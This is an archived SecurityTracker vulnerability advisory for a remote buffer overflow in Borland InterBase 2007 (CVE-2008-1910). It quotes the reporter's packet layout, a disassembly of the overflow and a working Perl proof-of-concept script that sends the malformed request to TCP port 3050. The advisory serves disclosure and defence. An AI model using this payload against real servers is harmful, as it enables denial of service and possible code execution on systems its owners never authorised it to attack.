SecurityTracker.com Archives - Borland InterBase Buffer Overflow in 'ibserver.exe' Lets Remote Users Execute Arbitrary Code

	Keep Track of the Latest Vulnerabilities with SecurityTracker!

SecurityTracker
Archives

Sign Up

Instant Alerts

Buy our Premium Vulnerability Notification Service to receive customized, instant alerts

Affiliates

Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!

Partners

Become a Partner and License Our Database or Notification Service

Report a Bug

Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com

Category: Application (Database) > InterBase

Vendors: Borland

Borland InterBase Buffer Overflow in 'ibserver.exe' Lets Remote Users Execute Arbitrary Code

SecurityTracker Alert ID: 1019834

SecurityTracker URL: http://securitytracker.com/id?1019834

CVE Reference: CVE-2008-1910 (Links to External Site)

Updated: Apr 24 2008

Original Entry Date: Apr 11 2008

Impact: Execution of arbitrary code via network, User access via network

Exploit Included: Yes

Version(s): 2007 SP2

Description: A vulnerability was reported in InterBase. A remote user can execute arbitrary code on the target system.

A remote user can send specially crafted data to TCP port 3050 trigger a buffer overflow in 'ibserver.exe' and execute arbitrary code on the target system. The code will run with the privileges of the target service.

Liu Zhen Hua reported this vulnerability.

Impact: A remote user can execute arbitrary code on the target system.

Solution: No solution was available at the time of this entry.

Vendor URL: www.codegear.com/downloads/regusers/interbase (Links to External Site)

Cause: Boundary error

Underlying OS: Linux (Any), UNIX (Solaris - SunOS), Windows (Any)

Reported By: "Liu Zhen Hua" <alau@163.com>

Message History: None.

Source Message Contents

Date: Fri, 11 Apr 2008 15:46:38 +0800
From: "Liu Zhen Hua" <alau@163.com>
Subject: Borland InterBase 2007

 
Borland InterBase 2007 "ibserver.exe" Buffer Overflow Vulnerability POC
 
Affected Software:
    Borland InterBase 2007 Service Pack 2.
    ibserver.exe version 8.0.0.123

Severity:
    High

Summary:
    There exists a vulnerability in Borland InterBase 2007.
    The attacker who successfully exploited this vulnerability can gain control of vulnerable systems
.

Details:
    There exists a buffer overflow vulnerability in "ibserver.exe" which is contained in Bo
rland InterBase 2007 Service Pack 2.
    
 The vulnerable opcode is 0x52. When sending some malformed data as below to TCP port 3050,
    | 4bytes Opcode  |                  "\x00\x00\x00\x52\"
    | 4bytes Unknow  |                  "\xFF\xFF\xFF\xFF"
    | 4bytes Length1 |                  "\x00\x00\x03\xE8"
    | Data1          |                  "\x41"x1000
    | 4bytes Length2 |                  "\x00\x00\x00\x10"
    | Data2          |                  "\x42"x16
  
 InterBase ibserver service will terminate and reboot. It results in the return address be overwritte
n as following.
.text:0041460F                 mov     ecx, [ebp+arg_4]
.text:00414612                 xor     edx, edx
.text:00414614                 mov     dx, [ecx]
.text:00414617                 push    edx
.text:00414618                 mov     eax, [ebp+arg_4]
.text:0041461B                 mov     ecx, [eax+4]
.text:0041461E                 push    ecx                          // | Data1 |   "\x41"x1
000
.text:0041461F                 mov     edx, [ebp+arg_0]
.text:00414622                 push    edx
.text:00414623                 mov     eax, [ebp+arg_0]
.text:00414626                 mov     ecx, [eax+4]
.text:00414629                 call    dword ptr [ecx+8]            //call function 411136 (strcpy)

.text:00411136                 push    ebp
.text:00411137                 mov     ebp, esp
.text:00411139                 push    ecx
.text:0041113A                 push    esi
.text:0041113B                 push    edi
......
.text:00411157                 mov     ecx, [ebp+loop_count]
.text:0041115A                 mov     eax, [ebp+recv_info_struct]
.text:0041115D                 mov     esi, [eax+0Ch]
.text:00411160                 mov     edi, [ebp+arg_4]
.text:00411163                 mov     edx, ecx
.text:00411165                 shr     ecx, 2
.text:00411168                 rep movsd                     
                                   //copy data 1000 bytes 0x41,without boundary check
                                   //Buffer overflow take place
.text:0041116A                 mov     ecx, edx
.text:0041116C                 and     ecx, 3
.text:0041116F                 rep movsb
    
:stack
    FrameEBP RetEIP  Syms Symbol 
    013AF5EC 41414141  N   ibserver!.text + 00026F68
 
How to Reproduce:
    Run the POC as below:
    poc.pl victimAddress
 
Discovered by:
    Liu Zhen Hua
 
#####################################################################################################
##########
#                                 POC.pl                                                             
      #
#####################################################################################################
##########
#!/usr/bin/perl -w
#Author:  Liu Zhen Hua <alau [at] 163.com> 

use IO::Socket;
use strict;
my $host=$ARGV[0];
sub usage {
print "usage: perl poc.pl serverip\n";
 
if ($#ARGV < 0) {
usage();
exit(); 
 
my $victim = IO::Socket::INET->new(Proto=>'tcp',
                                PeerAddr=>$host,
                                PeerPort=>3050);
my $pad0 = "\x41"x1000;       #"\x00\x00\x03\xE8"
my $pad5 = "\x43"x16; 
my $exploit = "\x00\x00\x00\x52\xFF\xFF\xFF\xFF\x00\x00\x03\xE8".$pad0."\x00\x00\x00\x
10".$pad5;
print $victim $exploit ;
print " + Malicious  request sent ...\n";
sleep(1);
print "Done.\n";
close($victim);
exit;

Go to the Top of This SecurityTracker Archive Page

Home | View Topics | Search | Contact Us | Help
Copyright 2007, SecurityGlobal.net LLC